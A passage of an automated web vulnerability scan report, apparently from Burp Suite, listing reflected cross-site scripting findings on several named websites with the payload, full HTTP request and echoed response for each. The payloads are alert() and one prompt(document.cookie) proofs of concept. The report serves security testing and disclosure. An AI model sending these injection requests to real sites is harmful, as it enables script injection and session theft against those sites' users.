Set-Cookie: phpbb3_bkwcz_k=; expires=Mon, 03-Sep-2012 14:06:02 GMT; path=/; HttpOnly
Set-Cookie: phpbb3_bkwcz_sid=25e7f7905fa4ed769f57e28e4f869cb9; expires=Mon, 03-Sep-2012 14:06:02 GMT; path=/; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<head>
...[SNIP]...
<script type="text/javascript">
var u = "/forum/viewtopic.php/c490e"-alert(1)-"5304d344149";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

1.274. http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/shop/search/hubs/Products/Software/F.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d6ea"><script>alert(1)</script>d7742b51610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/search/hubs/Products/Software/F.aspx?1d6ea"><script>alert(1)</script>d7742b51610=1 HTTP/1.1
Host: www.cdw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

1.275. http://www.cwsubscribe.com/cgi-win/cw.cgi [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/cgi-win/cw.cgi

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96cb9<script>alert(1)</script>b454d1449be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win96cb9<script>alert(1)</script>b454d1449be/cw.cgi HTTP/1.1
Host: www.cwsubscribe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:06:40 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 316

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win96cb9<script>alert(1)</script>b454d1449be/cw.cgi<P>
...[SNIP]...

1.276. http://www.cwsubscribe.com/cgi-win/cw.cgi [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/cgi-win/cw.cgi

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b4c6<script>alert(1)</script>0f6c424c537 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cw.cgi5b4c6<script>alert(1)</script>0f6c424c537 HTTP/1.1
Host: www.cwsubscribe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:06:40 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 302

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win/cw.cgi5b4c6<script>alert(1)</script>0f6c424c537<P>
...[SNIP]...

1.277. http://www.cwsubscribe.com/cgi-win/cw.cgi [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/cgi-win/cw.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32df9"><script>alert(1)</script>e83081e9307 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cw.cgi?32df9"><script>alert(1)</script>e83081e9307=1 HTTP/1.1
Host: www.cwsubscribe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:06:39 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 78306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Computerworld Subscription Services</title>
<meta http-equiv="Content-Ty
...[SNIP]...
<input type="hidden" name="CALLINGURL" value="32df9"><script>alert(1)</script>e83081e9307=1">
...[SNIP]...

1.278. http://www.cwsubscribe.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c3ef<script>alert(1)</script>2e6fe9bcb6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6c3ef<script>alert(1)</script>2e6fe9bcb6f HTTP/1.1
Host: www.cwsubscribe.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.0 403 Forbidden
Date: Sun, 04 Sep 2011 14:55:03 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 371

<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD>
<BODY bgcolor="White"><H2>403 Forbidden</H2>
File for URL /favicon.ico6c3ef<script>alert(1)</script>2e6fe9bcb6f (E:\WebSite\computerworld\favicon.ico6c3ef<script>
...[SNIP]...

1.279. http://www.itwhitepapers.com/images/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c88d"-alert(1)-"53469135a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4c88d"-alert(1)-"53469135a9/favicon.ico HTTP/1.1
Host: www.itwhitepapers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=apjgghpsi7e8kapncc03aq4l16; 2f1511d467aa3beecdd06ea6e9b79919=a26b837c116af36b6395df4561ff0dda

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:47:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:47:22 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
ive each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/images4c88d"-alert(1)-"53469135a9/favicon.ico1"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.e
...[SNIP]...

1.280. http://www.itwhitepapers.com/images/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5244a"-alert(1)-"9ed59062e72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/favicon.ico5244a"-alert(1)-"9ed59062e72 HTTP/1.1
Host: www.itwhitepapers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=apjgghpsi7e8kapncc03aq4l16; 2f1511d467aa3beecdd06ea6e9b79919=a26b837c116af36b6395df4561ff0dda

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:47:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:47:22 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
e an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/images/favicon.ico5244a"-alert(1)-"9ed59062e721"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.e
...[SNIP]...

1.281. http://www.itwhitepapers.com/images/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/images/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87c0e"-alert(1)-"a4ceb76708d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/favicon.ico?87c0e"-alert(1)-"a4ceb76708d=1 HTTP/1.1
Host: www.itwhitepapers.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=apjgghpsi7e8kapncc03aq4l16; 2f1511d467aa3beecdd06ea6e9b79919=a26b837c116af36b6395df4561ff0dda

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:47:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:47:21 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/images/favicon.ico?87c0e"-alert(1)-"a4ceb76708d=11"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s
...[SNIP]...

1.282. http://www.itwhitepapers.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5ac2"-alert(1)-"1c3a60ce1ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.phpb5ac2"-alert(1)-"1c3a60ce1ff HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:06:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:06:52 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.phpb5ac2"-alert(1)-"1c3a60ce1ff1"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.e
...[SNIP]...

1.283. http://www.itwhitepapers.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08da"-alert(1)-"50a1c51f4c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.php?e08da"-alert(1)-"50a1c51f4c4=1 HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:06:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:06:50 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.php?e08da"-alert(1)-"50a1c51f4c4=11"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s
...[SNIP]...

1.284. http://www.lexjansen.com/niftyCorners.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/niftyCorners.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fd17c<script>alert(1)</script>482e4b3de2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /niftyCorners.css?fd17c<script>alert(1)</script>482e4b3de2e=1 HTTP/1.1
Host: www.lexjansen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lexjansen.com/
Cookie: __utma=154154789.1651274394.1315147055.1315147055.1315147055.1; __utmb=154154789.1.10.1315147055; __utmc=154154789; __utmz=154154789.1315147055.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:37:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.11
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:37:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Content-Length: 8165

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Author" content="Lex Jansen" />
<meta name="authoring_tool" content="Ultra-Edit 10.00" /
...[SNIP]...
<br />www.lexjansen.com/niftyCorners.css?fd17c<script>alert(1)</script>482e4b3de2e=1   </h2>
...[SNIP]...

1.285. http://www.lexjansen.com/stylesheet/images/bg-gradient.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/stylesheet/images/bg-gradient.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5bf23<script>alert(1)</script>936597e5e0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheet/images/bg-gradient.png?5bf23<script>alert(1)</script>936597e5e0b=1 HTTP/1.1
Host: www.lexjansen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lexjansen.com/stylesheet/newstyle.css

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:37:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.11
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:37:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Content-Length: 8182

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Author" content="Lex Jansen" />
<meta name="authoring_tool" content="Ultra-Edit 10.00" /
...[SNIP]...
<br />www.lexjansen.com/stylesheet/images/bg-gradient.png?5bf23<script>alert(1)</script>936597e5e0b=1   </h2>
...[SNIP]...

1.286. http://www.lexjansen.com/vinfo/virusencyclo/default5.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/vinfo/virusencyclo/default5.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2bbdf<script>alert(1)</script>7cdfa61865a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vinfo/virusencyclo/default5.asp?2bbdf<script>alert(1)</script>7cdfa61865a=1 HTTP/1.1
Host: www.lexjansen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:07:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.11
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:07:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Content-Length: 8180

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Author" content="Lex Jansen" />
<meta name="authoring_tool" content="Ultra-Edit 10.00" /
...[SNIP]...
<br />www.lexjansen.com/vinfo/virusencyclo/default5.asp?2bbdf<script>alert(1)</script>7cdfa61865a=1   </h2>
...[SNIP]...

1.287. http://www.linkedin.com/countserv/count/share [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload e190a<img%20src%3da%20onerror%3dalert(1)>4afdb9e358c was submitted in the url parameter. This input was echoed as e190a<img src=a onerror=alert(1)>4afdb9e358c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspxe190a<img%20src%3da%20onerror%3dalert(1)>4afdb9e358c HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 12:12:55 GMT
Content-Length: 177

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.scmagazine.com.au\/News\/268907,kaspersky-website-vulnerable-to-xss.aspxe190a<img src=a onerror=alert(1)>4afdb9e358c"});

1.288. http://www.networkworld.com/ [ba876%27-prompt(document.cookie)-%276d0de08921e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The value of the ba876%27-prompt(document.cookie)-%276d0de08921e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6221'-alert(1)-'cda19918816 was submitted in the ba876%27-prompt(document.cookie)-%276d0de08921e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?ba876%27-prompt(document.cookie)-%276d0de08921e=1f6221'-alert(1)-'cda19918816 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/15
Cookie: Apache=50.23.123.106.1315147426262493; s_pers=%20s_pv%3Dhomepage%253AHomepage%7C1315149426650%3B; __utma=219500550.255216774.1315147627.1315147627.1315147627.1; __utmb=219500550.1.10.1315147627; __utmz=219500550.1315147627.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; lastTopStoryBlock=2; __utmc=219500550; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; mobify=0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 14:47:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:47:06 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 226581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
: 'no',
subtopicid: 0,
outerref: 'http://burp/show/15',
nwchannel: 'Network World',
request_uri: '/?ba876%27-prompt(document.cookie)-%276d0de08921e=1f6221'-alert(1)-'cda19918816',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?ba876%27-prom
...[SNIP]...

1.289. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba876'-alert(1)-'6d0de08921e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?ba876'-alert(1)-'6d0de08921e=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 14:11:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:11:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 226357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?ba876'-alert(1)-'6d0de08921e=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?ba876'-aler
...[SNIP]...

1.290. http://www.networkworld.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/favicon.ico

Issue detail

